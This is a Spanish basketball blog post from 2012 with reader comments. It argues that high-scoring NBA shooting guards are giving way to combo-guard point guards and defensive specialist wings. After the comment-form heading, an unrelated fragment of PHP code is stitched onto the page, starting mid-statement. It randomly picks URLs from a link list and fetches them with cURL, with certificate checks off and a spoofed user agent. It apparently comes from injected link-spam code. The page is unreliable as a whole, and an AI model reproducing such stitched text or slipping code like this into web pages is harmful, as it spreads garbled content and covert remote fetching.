Evolución

16 de April de 2012 por Hynreck

La adaptación al entorno es la base de la supervivencia. De hecho cuando se introduce una nueva especie en un ecosistema, puede producir una gran alteración en dicha comunidad. Un nuevo grupo dominante hace que los demás tengan que buscar un nuevo hábitat, variando sus costumbres e incluso su sustento.

No estamos descubriendo nada si os hablamos hoy de la progresiva desaparición del center dominante, ni del cada vez más extraño base puro. Poder encontrar hoy en día un Chamberlain, un Kareem, un Olajuwon, o un Stockton, por no hablar de algo casi único como era “Magic” Johnson, es una quimera.

Pero lo que queremos hacer notar hoy es al afectado indirecto. Hace no mucho la liga estaba plagada de shooting guards que eran la referencia en ataque de su equipo. En plena eclosión de Jordan teníamos a los Drexler o Richmond, más tarde a Reggie Miller, Michael Finley o Steve Smith, posteriormente a Kobe, McGrady, Carter, Stackhouse, Rip Hamilton, Ray Allen… Tener un escolta anotador que supiese fabricar sus tiros parecía esencial para el éxito del equipo. Eran estrellas y como tal estaban cotizadas. Cada franquicia buscaba su referencia en el puesto de 2. Era el jugador a parar por el equipo contrario y al que se le daban las bolas calientes del partido.

Pero, desde hace aproximadamente una década, poco a poco ha ido surgiendo un nuevo modelo de jugador propiciando la extinción del escolta anotador. El combo-guard, escolta en cuerpo de base y que ejerce como tal, ha desplazado al base puro asistente al ostracismo. Más alto, más atlético, más rápido, más anotador y mejor defensor. Quedan reductos como el gran Steve Nash (que nos dure aún muchos años a los románticos), pero los Derrick Rose, Russell Westbrook, John Wall, Jrue Holiday y compañía son el nuevo mirlo blanco que buscan todos los GM’s de la liga.

En España no entendemos como jugadores dominantes aquí como Rudy o Navarro no han encontrado su sitio en la NBA. La explicación, o una de ellas (no queremos sentenciar, es una opinión), se debe a la nueva figura de jugador que ha proliferado a la sombra de los nuevos bases anteriormente mencionados. Los SG’s (shooting guards) de toda la vida han sido sustituidos sigilosamente por los aquí, en TJNBA, bautizados como DG’s (Defense guard), o como “machakas” en otras páginas amigas. Escoltas especializados en defender al anotador contrario. Su aportación en ataque suele limitarse a recibir el balón solos en una esquinita y anotar en suspensión. Ejemplos hay por doquier: Deshawn Stevenson, Wesley Matthews, Aarron Afflalo, Ronnie Brewer, Thabo Sefolosha, Courtney Lee, Tony Allen… Complementos para el nuevo modelo de base, jugadores que le descarguen de la labor defensiva para que pueda explotar sus condiciones en la ofensiva.

¿Qué jugadores jóvenes podrían ser hoy la alternativa a ser escoltas franquicia en sus equipos? ¿Eric Gordon? ¿Tyreke Evans? Grandes jugadores pero muy lejos de otros nombres de antaño. En ningún caso dominantes.

Es ley de vida y es un hecho que jugadores que hace 10 años, posiblemente y salvo excepciones, no hubiesen tenido lugar en la liga, hoy en día son casi imprescindibles para cualquier entrenador.

Con añoranza echamos la vista atrás pero sin perder la perspectiva de qué nuevos tiempos corren en el baloncesto americano. Mientras tanto Bruce Bowen esboza una  sonrisa desde su hogar con la satisfacción del deber cumplido y el orgullo de una creación de la que se sabe cómplice. A su vez, mientras escribimos esto, recordamos las hazañas inútiles de T-Mac, que Kobe tiene 34 años, que Jordan ahora es propietario, nos resuena en la cabeza una voz conocida que grita “Es tiempo de un killer, tiempo de Reggie Miller” y sin darnos cuenta estamos tarareando aquello de…

“…everything dies, baby, that’s a fact
but maybe everything that dies, someday comes back…”

Comenta

16 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Magnífico artículo. Precisamente me pasaba esto hace dos días jugando al 2k11. Llega el año de la retirada de Kobe (2016 o por ahí después de renovarle) y no consigo un escolta que pueda heredar ese puesto. Un tío con un tiro decente y que pueda jugar al poste. Lo más parecido y joven (en el juego) es Evan Turner o Tyreke Evans, y ya en todo caso Wesley Johnson porque es alto, pero no sabe postear.

    A ver si alguno me da una idea jajajaja 😛

      Citar

  2. Txusma dice:
    #2

    Has llegado al 2016 en modo franquicia jugando 82 partidos por temporada?

      Citar

  3. Denise dice:
    #3

    Jose Luis:
    Un tío con un tiro decente y que pueda jugar al poste. Lo más parecido y joven (en el juego) es Evan Turner o Tyreke Evans, y ya en todo caso Wesley Johnson porque es alto, pero no sabe postear.

    A ver si alguno me da una idea jajajaja

    ¿Te valen James Harden, Nick Young, Aaron Afflalo, Nico Batum, o Wesley Matthews?

      Citar

  4. Jose Luis dice:
    #4

    mmm Harden quizá podría valer, Batum no es escolta y los demás no les veo jugando al poste.

    Y si, jugando 82 partidos por temporada más los PO, pero a 6 minutos por cuarto, no a 12. Juego con mi hermano pequeño, así que solo jugamos cuando coincidimos. Pero aún así hemos llegado a ese año jajaja

      Citar

  5. Viva_Dirk dice:
    #5

    Menudo cachondo Jose Luis, asi que no consigues ‘un escolta que pueda heredar el puesto de Bryant’, me parece normal tratandose seguramente del 2º mejor escolta de la historia y un top 20 global.

      Citar

  6. Sancho88 dice:
    #6

    A SUS PIES HYNRECK!! PEDAZO DE ARTÍCULO!! Pues sí macho, en los 90 había pistoleros que te reventaban los partidos. A mí me encantaba esa época. Yo incluiría también a Dell Curry, Hornacek y Steve Kerr entre aquellos prestigiosos (aunque tú estás hablando de jugadores que han jugado más en la década del 2000), y actualmente Kevin Martin es un poco ese tipo de jugador, y Ginobili, a pesar de ser completísimo también en defensa, en ataque también ha bebido del estilo de juego de aquellos jugadores. Pero sí, los shooting guards son un modelo a extinguir, y la especie invasora son los combo-guards, que personalmente no les veo talento suficiente para guiar a su equipo, como bien decís, aunque son jugadores muy apreciados por sus entrenadores, no tanto por el buen aficionado a la NBA, que no entiende en muchos casos sus limitaciones en ataque… no sé, yo me quedo con los pistoleros de toda la vida, lo del combo guard es como el cangrejo americano, una especie invasora que no mola nada

      Citar

  7. Esteban dice:
    #7

    Denise: , Ronnie Brewer, Thabo Sefolosha, Courtney Lee, Tony Allen… Complementos para el nuevo modelo de base, jugadores que le descarguen de la labor defen

    denise me parece una falta de respeto nombrar a nick young como reemplazante de kobe… simplente no califica ni para la discusion

      Citar

  8. Esteban dice:
    #8

    tiradores, monta ellis, marcus thompson,

    reemplazante de kobe, wade, un pasoi detras harden y ya surgira otro

    pivote dominante, howard, bynum, la lesion de oden nos dejo sin uno mas, y nos esperan anthoy davis y andre drummond

    cp3 y deron williams son los bases clasicos, si promedian mas puntos que stockton es simplemtente por q son mejores, no por q juegen de otra forma, sus asistencias lo confirmar

    derrick rose, y wall, el año pasado parecien la regla, pero terminan por ser la exepcion, cuantos bases mas hay con ese fisico en la liga, o en realidad escoltad disfrazados de base?
    solo son ellos dos, no se confundan, incluso irving es mas parecido a cp3 q a rose

    VAMOS A DEJAR DE AÑORAR EL PASADO QUE EL PRESENTE NO ES TAN MALO!!!!

      Citar

  9. Viva_Dirk dice:
    #9

    Y ahora cuidadín que va parrafada. A pesar del gran respeto que le tengo a la opinión de su autor no estoy deacuerdo con casi nada de lo que dice el artículo, vamos por partes.

    – Que el center dominante y el base puro esten desapareciendo me parece muy discutible, y si una de las razones para confirmarlo es que es imposible encontrar ‘un Chamberlain, Kareem, Olajuwon, Stockton o Magic’ es una obviedad, son 3 de los 5 mejores centers de la historia seguro, el máximo asistente de la historia y un base de 2.06 que desde luego era cualquier cosa menos un base clásico. Si miramos la tabla de anotadores de la temporada 90-91 entre los 20 primeros encontramos cuatro centers, tantos como bases los cuales también ocupaban puestos muy altos en la tabla de asistentes pero en modo alguno podriamos hablar de base puro o playmaker al hablar de Kevin Johnson, Tim Hardaway, Michael Adams o el mismísimo Isiah Thomas, estos son algunos de los mejores bases anotadores de la historia, y eso no les hacia ser menos bases. En el caso de los centers habrá que esperar para juzgar a jugadores como D.Howard, Bynum, Cousins o Hibbert para hablar de la desaparición del center dominante, que por cierto no es algo que abunde a lo largo de la historia…como el base distribuidor puro.

    – Los bases con combo guards atléticos, anotadores y buenos defensores han sido siempre piezas muy importantes en equipo ganadores(campeones o no, pero ganadores), Payton, Penny Hardaway o Derek Harper son buena muestra de ello. Actualmente podemos nombrar a jugadores como Chris Paul, Deron Williams, John Wall, Westbrook o Rose capaces de liderar la anotación de su equipo y hacer mejores a sus compañeros, como hacian los nombrados en el artículo anterior. A ‘los romanticos’ les encanta hablar de bases distribuidores puros pero ¿cuantos hemos visto?, si repasamos la lista de máximos asistentes por partido de la historia veremos que hay poquísimos que encajen en esa descripción y menos aun que además llevaran a su equipo a las cotas mas altas, diria que no hay mas de 10 nombres que respondan a ese perfil tan definido del que se habla, algunos de ellos estan en activo y a otros les quedan muchos años como son Rajon Rondo o Ricky Rubio.

    – Al hablar de escoltas anotadores se mezclan demasiados niveles. Para empezar Carter y McGrady jamás fueron escoltas, ambos eran grandes anotadores y ambos aleros. A Kobe aun lo estamos disfrutando y a Wade le quedan muchos años en la liga, ambos escoltas anotadores como pocos en la historia. Eric Gordon, Monta Ellis o Tyreke Evans estan muy lejos de otros nombres de antaño? De cuales? De los mas selectos sin duda alguna, del resto solo el tiempo lo dirá, pero ya son tan anotadores o mas que los Finley, Smith, Miller, Stackhouse o Hamilton.

    – Acabo diciendo que tendemos a infravalorar lo que tenemos, pero cuando se miran las cosas objetivamente el nivel sigue siendo tan bueno como siempre o mas.

      Citar

  10. Jose Luis dice:
    #10

    Hombre Viva, tampoco quiero un tío del nivel de Bryant jajajaja, pero sí que me cuesta encontrar un tío que pueda hacer ambas cosas, tiro exterior y juego al poste, aunque no con tanta efectividad evidentemente. Evans no tira para nada, al igual que Turner, Wade anda ya por los 32 o así, y quizá Harden sí que me valga. Tendré que probar a ver como lo consigo jajajaja.

      Citar

  11. Jose Luis dice:
    #11

    Lo de Wade me refiero en el juego, en el 2016, en ese contexto estaba hablando

      Citar

  12. German dice:
    #12

    Probablemente en uno de los peores partidos de la historia de la NBA, los Bobcats y los Hornets dan inicio al ultimo cuarto empatados en….. 47!!!!!!!!!!!!!!

      Citar

  13. German dice:
    #13

    Apenas 30% de campo entre ambos equipos, 1-18 en triples. Hoy es el partido a ganar para los Bobcats

      Citar

  14. German dice:
    #14

    Perdon me equivoque de post, ahora lo pego en el otro, borren esto si quieren xD

    Por cierto, el articulo es muy bueno.

      Citar

  15. Nacho dice:
    #15

    – Acabo diciendo que tendemos a infravalorar lo que tenemos, pero cuando se miran las cosas objetivamente el nivel sigue siendo tan bueno como siempre o mas.

    No puedo estar más de acuerdo con esta frase. Es más, la podemos sacar del contexto en el que estamos y aplicarlo a cualquier otro.

      Citar

  16. Nacho dice:
    #16

    Por cierto, la frase es de Viva, pero no sé qué hago al citar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>